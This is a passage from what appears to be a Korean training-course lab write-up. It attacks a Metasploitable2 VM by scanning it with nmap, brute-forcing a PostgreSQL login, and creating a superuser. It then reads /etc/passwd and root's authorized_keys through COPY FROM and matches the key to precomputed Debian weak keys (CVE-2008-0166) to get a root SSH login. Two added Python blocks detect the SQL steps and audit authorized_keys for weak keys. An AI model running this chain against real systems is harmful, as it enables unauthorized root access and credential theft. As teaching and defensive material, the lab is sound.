Information Security (old version)/Metasploit 2016. 6. 3. 10:54

Metasploit - 07. Vulnerability Discovery and Attack (CVE-2008-0166)

This material is intended for hands-on practice in a training course. Anyone who uses it for personal or malicious purposes bears the legal responsibility for doing so.

 

 

[Lab systems] Kali Linux, Firewall, Metasploitable2-Linux

 

 

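 - CVE-2008-0166 refers to the random number generation vulnerability in the Debian OpenSSL package.

 - The random data used when a cryptographic key is generated becomes guessable, and that is what makes the vulnerability exploitable.

 - If exploitation succeeds, the cryptographic keys are compromised and sensitive data can be accessed.

 - Only Debian OpenSSL versions before 0.9.8c-4etch3 are affected.

 - exploit-db site -> search -> search for CVE-2008-0166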

 - https://www.exploit-db.com/exploits/5720/

 

 

[Lab steps]

Scan -> PostgreSQL ID/password attack -> PostgreSQL login -> obtain user account information -> SSH key hacking -> SSH login

 

 

 

Ex1) Set the administrator password on Metasploitable2-Linux

 

@ Metasploitable2-Linux

 

msfadmin@metasploitable:~$ sudo -s
[sudo] password for msfadmin: msfadmin
root@metasploitable:~# passwd
Enter new UNIX password: toor
Retype new UNIX password : toor
passwd : password updated successfully
root@metasploitable:~# exit
logout
msfadmin@metasploitable:~$

 

 

 

 

Ex2) Download and extract the SSH RSA files

 

@ Kali Linux

 

 - Search Exploit DB for OpenSSL

 

root@kali:~# /usr/share/exploitdb/searchsploit openssl
--------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                       |  Path
                                                                     | (/usr/share/exploitdb/platforms)
--------------------------------------------------------------------- ----------------------------------
OpenSSL ASN.1<= 0.9.6j <= 0.9.7b - Brute Forcer for Parsing Bugs     | ./multiple/dos/146.c
Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)    | ./linux/remote/764.c
OpenSSL < 0.9.7l / 0.9.8d - SSLv2 Client Crash Exploit               | ./multiple/dos/4773.pl
Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Perl)      | ./multiple/remote/5622.txt
Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Ruby)      | ./multiple/remote/5632.rb
Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Python)    | ./linux/remote/5720.py
~ output omitted ~

 

 

 

 - Check the SSH RSA information and the download link (file '5622.txt')

 

root@kali:~# cat /usr/share/exploitdb/platforms/multiple/remote/5622.txt
the debian openssl issue leads that there are only 65.536 possible ssh
keys generated, cause the only entropy is the pid of the process
generating the key.

 

This leads to that the following perl script can be used with the
precalculated ssh keys to brute force the ssh login. It works if such a
keys is installed on a non-patched debian or any other system manual
configured to.

 

On an unpatched system, which doesn't need to be debian, do the following:

 

keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/

 

1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
     https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)

 

2. Extract it to a directory

~ output omitted ~

 

 

 

 - Download the SSH RSA files

 

root@kali:~# cd /var/tmp
root@kali:/var/tmp#

root@kali:/var/tmp# wget --no-check-certificate https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2

 

--2016-06-03 11:28:57--  https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2
Resolving github.com (github.com)... 192.30.252.121
Connecting to github.com (github.com)|192.30.252.121|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/5622.tar.bz2 [following]
--2016-06-03 11:28:58--  https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/5622.tar.bz2
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 103.245.222.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|103.245.222.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 50226987 (48M) [application/octet-stream]
Saving to: ‘5622.tar.bz2’

 

5622.tar.bz2             100%[===============================>]  47.90M   989KB/s   in 33s   

 

2016-06-03 11:29:34 (1.45 MB/s) - ‘5622.tar.bz2’ saved [50226987/50226987]

 

 

 - Extract the SSH RSA archive

 

root@kali:/var/tmp# tar xvif 5622.tar.bz2

rsa/
rsa/2048/
rsa/2048/2712a6d5cec99f295a0c468b830a370d-28940.pub
rsa/2048/eaddc9bba9bf3c0832f443706903cd14-28712.pub

~ output omitted ~

 

 

root@kali:/var/tmp# cd

root@kali:~#

 

 

 

Ex3) Scan '192.168.20.204'

 - Use nmap to scan '192.168.20.204'.

 

@ Kali Linux

 

root@kali:~# nmap -sV 192.168.20.204

 

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-03 12:06 KST
Nmap scan report for 192.168.20.204
Host is up (0.00061s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  shell       Netkit rshd
1099/tcp open  rmiregistry GNU Classpath grmiregistry
1524/tcp open  shell       Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         Unreal ircd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:34:5A:8A (VMware)
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

 

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.00 seconds

 

 


Ex4) PostgreSQL username/password dictionary attack

 

root@kali:~# msfconsole -q

 

msf > search postgres_login

Matching Modules
================

   Name                                       Disclosure Date  Rank    Description
   ----                                       ---------------  ----    -----------
   auxiliary/scanner/postgres/postgres_login                   normal  PostgreSQL Login Utility

 

msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) >
msf auxiliary(postgres_login) > show options

Module options (auxiliary/scanner/postgres/postgres_login):

   Name              Current Setting                                                               Required  Description
   ----              ---------------                                                               --------  -----------
   BLANK_PASSWORDS   false                                                                         no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                             yes       How fast to bruteforce, from 0 to 5
   DATABASE          template1                                                                     yes       The database to authenticate against
   DB_ALL_CREDS      false                                                                         no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                         no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                         no        Add all users in the current database to the list
   PASSWORD                                                                                        no        A specific password to authenticate with
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RETURN_ROWSET     true                                                                          no        Set to true to see query result sets
   RHOSTS                                                                                          yes       The target address range or CIDR identifier
   RPORT             5432                                                                          yes       The target port
   STOP_ON_SUCCESS   false                                                                         yes       Stop guessing when a credential works for a host
   THREADS           1                                                                             yes       The number of concurrent threads
   USERNAME          postgres                                                                      no        A specific username to authenticate as
   USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/postgres_default_userpass.txt  no        File containing (space-seperated) users and passwords, one pair per line
   USER_AS_PASS      false                                                                         no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt      no        File containing users, one per line
   VERBOSE           true                                                                          yes       Whether to print output for all attempts

 


msf auxiliary(postgres_login) > set RHOSTS 192.168.20.204
RHOSTS => 192.168.20.204


msf auxiliary(postgres_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true

 


msf auxiliary(postgres_login) > exploit

[-] 192.168.20.204:5432 POSTGRES - LOGIN FAILED: postgres:@template1 (Incorrect: Invalid username or password)
[-] 192.168.20.204:5432 POSTGRES - LOGIN FAILED: postgres:tiger@template1 (Incorrect: Invalid username or password)
[+] 192.168.20.204:5432 - LOGIN SUCCESSFUL: postgres:postgres@template1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(postgres_login) >
msf auxiliary(postgres_login) > exit
root@kali:~#

 

 

 

 

Ex5) Connect to the PostgreSQL server and inspect the DB

 

@ Kali Linux

 

 - Connect to PostgreSQL on Metasploitable2-Linux using 'postgres/postgres'.

 

root@kali:~# psql -h 192.168.20.204 -U postgres
Password for user postgres: postgres
psql (9.4.3, server 8.3.1)
SSL connection (protocol: TLSv1, cipher: DHE-RSA-AES256-SHA, bits: 256, compression: off)
Type "help" for help.

postgres=#

 

 

 - Check the PostgreSQL version

 

postgres=# select version();
                                            version                                           
-----------------------------------------------------------------------------------------------
 PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
(1 row)

 

 

 - Check the user table

 

postgres=# select * from pg_user;
 usename  | usesysid | usecreatedb | usesuper | usecatupd |  passwd  | valuntil | useconfig
----------+----------+-------------+----------+-----------+----------+----------+-----------
 postgres |       10 | t           | t        | t         | ******** |          |
(1 row)

 

 

 - Add a 'test' user and verify

 

postgres=# create user test with password 'test1234';
CREATE ROLE

postgres=# select * from pg_user;
 usename  | usesysid | usecreatedb | usesuper | usecatupd |  passwd  | valuntil | useconfig
----------+----------+-------------+----------+-----------+----------+----------+-----------
 postgres |       10 | t           | t        | t         | ******** |          |
 test     |    16384 | f           |          | f         | ******** |          |
(2 rows)

 

 

 - Escalate the 'test' user's privileges and verify

 

postgres=# alter user test with superuser;
ALTER ROLE

postgres=# select * from pg_user;
 usename  | usesysid | usecreatedb | usesuper | usecatupd |  passwd  | valuntil | useconfig
----------+----------+-------------+----------+-----------+----------+----------+-----------
 postgres |       10 | t           | t        | t         | ******** |          |
 test     |    16384 | f           | t        | f         | ******** |          |
(2 rows)

 


 - List all schemas and databases

 

postgres-# \dn
  List of schemas
  Name  |  Owner  
--------+----------
 public | postgres
(1 row)

 


postgres-# \l
                    List of databases
   Name    |  Owner   | Encoding |   Access privileges  
-----------+----------+----------+-----------------------
 postgres  | postgres | UTF8     |
 template0 | postgres | UTF8     | =c/postgres          +
           |          |          | postgres=CTc/postgres
 template1 | postgres | UTF8     | =c/postgres          +
           |          |          | postgres=CTc/postgres
(3 rows)

 

 

 - Create the accounts table and copy the contents of '/etc/passwd' into it

 

postgres=# create table accounts (linux_users text);
CREATE TABLE

postgres=# copy accounts from '/etc/passwd';
COPY 37

 

 

 - Show the rows of the accounts table that contain 'bash'

 

postgres=# select * from accounts where linux_users like '%bash%';
                                 linux_users                                 
------------------------------------------------------------------------------
 root:x:0:0:root:/root:/bin/bash
 msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
 postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
 user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
 service:x:1002:1002:,,,:/home/service:/bin/bash
(5 rows)

 

 

 - Create the sshkeys table and copy the contents of '/root/.ssh/authorized_keys' into it

 

postgres=# create table sshkeys (auth_key text);
CREATE TABLE

 

postgres=# copy sshkeys from '/root/.ssh/authorized_keys';
COPY 1

 

 

 - Show the rows of the sshkeys table that contain 'ssh-rsa'


postgres=# select * from sshkeys where auth_key like '%ssh-rsa%';

 

                                                                                           auth_key
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6
PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5te
oweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYg
ZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D
9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf
+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
(1 row)

(END)

 

q


 

 

 - Close the PostgreSQL connection

 

postgres=# \q
root@kali:~#
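
Seen from the database side, the Ex5 session leaves distinctive statements in the server log. The following detector is an added example, not part of the original post; it assumes log_statement is set to 'mod' or 'all', and the timestamps and log prefix in the sample lines are constructed.

```python
import re

# Assumption: with log_statement = 'mod' or 'all', each query is logged as
# "LOG:  statement: <sql>" after whatever log_line_prefix is configured.
STATEMENT = re.compile(r"LOG:\s+statement:\s+(?P<sql>.+)$")

RULES = [
    ("copy-from-file", re.compile(
        r"^\s*copy\s+.+?\s+from\s+'(?P<arg>[^']+)'", re.I)),
    ("grant-superuser", re.compile(
        r"^\s*alter\s+(?:user|role)\s+(?P<arg>\S+)\s+(?:with\s+)?superuser\b",
        re.I)),
    ("create-role", re.compile(
        r"^\s*create\s+(?:user|role)\s+(?P<arg>\S+)", re.I)),
]
# Server-side reads from these locations are never routine data loads.
SENSITIVE = ("/etc/", "/root/", "/home/")


def scan(log_lines):
    """Return [(line_no, rule, argument, severity)] for suspicious statements."""
    findings = []
    for line_no, line in enumerate(log_lines, 1):
        logged = STATEMENT.search(line)
        if not logged:
            continue
        for rule, pattern in RULES:
            hit = pattern.search(logged.group("sql"))
            if not hit:
                continue
            arg = hit.group("arg").rstrip(";")
            high = rule == "grant-superuser" or (
                rule == "copy-from-file"
                and (arg.startswith(SENSITIVE) or "/.ssh/" in arg))
            findings.append((line_no, rule, arg, "high" if high else "review"))
            break
    return findings


# Constructed log lines replaying the statements typed in Ex5, plus one
# ordinary import for contrast.
SAMPLE_LOG = """\
2016-06-03 12:31:02 KST LOG:  statement: select version();
2016-06-03 12:32:10 KST LOG:  statement: create user test with password 'test1234';
2016-06-03 12:32:40 KST LOG:  statement: alter user test with superuser;
2016-06-03 12:35:05 KST LOG:  statement: create table accounts (linux_users text);
2016-06-03 12:35:20 KST LOG:  statement: copy accounts from '/etc/passwd';
2016-06-03 12:36:01 KST LOG:  statement: copy sshkeys from '/root/.ssh/authorized_keys';
2016-06-03 12:40:00 KST LOG:  statement: copy report from '/var/lib/postgresql/import/report.csv';
""".splitlines()

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print("line %d: %s %s [%s]" % finding)
```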

 

 


 

Ex6) Reconnect to the PostgreSQL server to obtain the SSH RSA key

 

 - Query the sshkeys table and save the SSH key

 

root@kali:~# psql -h 192.168.20.204 -U postgres -c 'select * from sshkeys limit 1' | tee sshkeys.txt
Password for user postgres: postgres
                                                                                                                                                                                                      

                                                                                           auth_key
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6
PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5te
oweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYg
ZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D
9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf
+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
(1 row)

 

 

 - Check the 'sshkeys.txt' file

 

root@kali:~# ls -l sshkeys.txt
-rw-r--r-- 1 root root 1229  6월  3 12:42 sshkeys.txt

 

 

root@kali:~# cat sshkeys.txt

                                                                                           auth_key
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6
PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5te
oweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYg
ZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D
9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf
+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
(1 row)

 

 

 - Search 'sshkeys.txt' for 'ssh-rsa' and print the second field

 

root@kali:~# grep "ssh-rsa" sshkeys.txt | awk '{print $2}'


AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6
PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5te
oweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYg
ZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D
9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf
+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w==

 

 

 - Show it again with only the trailing '==' removed

 

root@kali:~# grep "ssh-rsa" sshkeys.txt | awk '{print $2}' | sed 's/==$//'

 

AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6
PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5te
oweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYg
ZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D
9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf
+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w

 

 

 - Search the '/var/tmp/rsa/2048/*.pub' files for the same content as in 'sshkeys.txt' and save the result as 'keys.txt'

 

 

 

root@kali:~# fgrep `grep "ssh-rsa" sshkeys.txt | awk '{print $2}' | sed 's/==$//'` /var/tmp/rsa/2048/*.pub | tee keys.txt


/var/tmp/rsa/2048/57c3115d77c56390332dc5c49978627a-5429.pub:ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG
70lShHQqldJkcteZZdPFSbW76IUiPR0OWBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qO
ffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JX
ln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQ
PE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5
cCs4WocyVxsXovcNnbALTp3w== root@targetcluster

 

root@kali:~# ls keys.txt
keys.txt


root@kali:~# cat keys.txt
/var/tmp/rsa/2048/57c3115d77c56390332dc5c49978627a-5429.pub:ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG
70lShHQqldJkcteZZdPFSbW76IUiPR0OWBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qO
ffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JX
ln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQ
PE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5
cCs4WocyVxsXovcNnbALTp3w== root@targetcluster

 

 

 - From 'keys.txt', filter out the name of the file in the '/var/tmp/rsa/2048' directory that contains the matching key

 

root@kali:~# cat keys.txt | awk -F: '{print $1}'
/var/tmp/rsa/2048/57c3115d77c56390332dc5c49978627a-5429.pub

 

 

 - Strip '.pub' from the file name and check the result


root@kali:~# cat keys.txt | awk -F: '{print $1}' | sed 's/.pub//'
/var/tmp/rsa/2048/57c3115d77c56390332dc5c49978627a-5429

 

 - Connect to Metasploitable2-Linux over SSH

 

root@kali:~# ssh -i `cat keys.txt | awk -F: '{print $1}' | sed 's/.pub//'` root@192.168.20.204
The authenticity of host '192.168.20.204 (192.168.20.204)' can't be established.
RSA key fingerprint is 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.20.204' (RSA) to the list of known hosts.
Last login: Thu Jun  2 04:00:18 2016 from :0.0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

 

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

 

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~#

root@metasploitable:~# exit
logout
Connection to 192.168.20.204 closed.
root@kali:~#

 

 

 

[Note] If the error message 'bash: /bin/fgrep: 인수 명단이 너무 김' (Argument list too long) appears, change to the rsa/2048 directory and use the 'xargs' command

 

 

 - If '5622.tar.bz2' was extracted in the root home directory

 

root@kali:~# cd /root/rsa/2048
root@kali:~/rsa/2048#

root@kali:~/rsa/2048# ls *.pub | xargs fgrep `grep "ssh-rsa" /root/sshkeys.txt | awk '{print $2}' | sed 's/==$//'` | tee /root/keys.txt

 

 

root@kali:~/rsa/2048# cat /root/keys.txt
57c3115d77c56390332dc5c49978627a-5429.pub:ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== root@targetcluster

 

root@kali:~/rsa/2048# cat /root/keys.txt | awk -F: '{print $1}'
57c3115d77c56390332dc5c49978627a-5429.pub

 

root@kali:~/rsa/2048# cat /root/keys.txt | awk -F: '{print $1}' | sed 's/.pub//'
57c3115d77c56390332dc5c49978627a-5429

 

root@kali:~/rsa/2048# ssh -i `cat /root/keys.txt | awk -F: '{print $1}' | sed 's/.pub//'` root@192.168.20.204
The authenticity of host '192.168.20.204 (192.168.20.204)' can't be established.
RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.20.204' (RSA) to the list of known hosts.

Last login: Sun Feb 25 21:56:50 2018 from :0.0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.

root@metasploitable:~#
root@metasploitable:~# exit
logout
Connection to 192.168.20.204 closed.
root@kali:~/rsa/2048#
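
The comparison that Ex6 performs with fgrep can be run the other way round, as an audit of a host's own authorized_keys against a directory of known-weak public keys. This is an added example, not part of the original post; the function names are hypothetical and the key blobs in demo() are constructed stand-ins (a valid SSH wire-format header with a fake body), not real keys.

```python
import base64
import hashlib
import os
import tempfile

KEY_TYPES = ("ssh-rsa", "ssh-dss")


def parse_key(line):
    """Return (raw_blob, comment) for an authorized_keys/.pub line, else None."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = line.split()
    # An options field (command="...",no-pty) may precede the key type, so each
    # hit is confirmed: the decoded blob must start with the length-prefixed type.
    for i in range(len(fields) - 1):
        if fields[i] not in KEY_TYPES:
            continue
        try:
            raw = base64.b64decode(fields[i + 1], validate=True)
        except ValueError:
            continue
        name = fields[i].encode()
        if raw.startswith(len(name).to_bytes(4, "big") + name):
            return raw, " ".join(fields[i + 2:])
    return None


def fingerprint(raw):
    """OpenSSH-style SHA256 fingerprint of a raw key blob."""
    digest = hashlib.sha256(raw).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def load_weak_set(directory):
    """Fingerprint every *.pub in directory (scandir: no glob, no E2BIG)."""
    weak = set()
    for entry in os.scandir(directory):
        if entry.name.endswith(".pub"):
            with open(entry.path, errors="replace") as fh:
                parsed = parse_key(fh.readline())
            if parsed:
                weak.add(fingerprint(parsed[0]))
    return weak


def audit(authorized_keys_text, weak):
    """Return [(line_no, fingerprint, comment)] for entries that must go."""
    findings = []
    for line_no, line in enumerate(authorized_keys_text.splitlines(), 1):
        parsed = parse_key(line)
        if parsed and fingerprint(parsed[0]) in weak:
            findings.append((line_no, fingerprint(parsed[0]), parsed[1]))
    return findings


def demo():
    """Audit constructed (not real) keys against a constructed weak set."""
    def blob(body):
        return base64.b64encode(b"\x00\x00\x00\x07ssh-rsa" + body).decode()
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "constructed-1.pub"), "w") as fh:
            fh.write("ssh-rsa %s root@targetcluster\n" % blob(b"weak"))
        sample = ["# constructed sample, not real keys",
                  "ssh-rsa %s admin@example" % blob(b"not-listed"),
                  'command="/bin/true",no-pty ssh-rsa %s msfadmin@metasploitable'
                  % blob(b"weak")]
        return audit("\n".join(sample), load_weak_set(d))
```

Any entry that audit() reports should be removed from authorized_keys and replaced with a key pair generated on a patched system.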

 


 

Posted by instructor 김정우 (KakaoTalk: kim10322)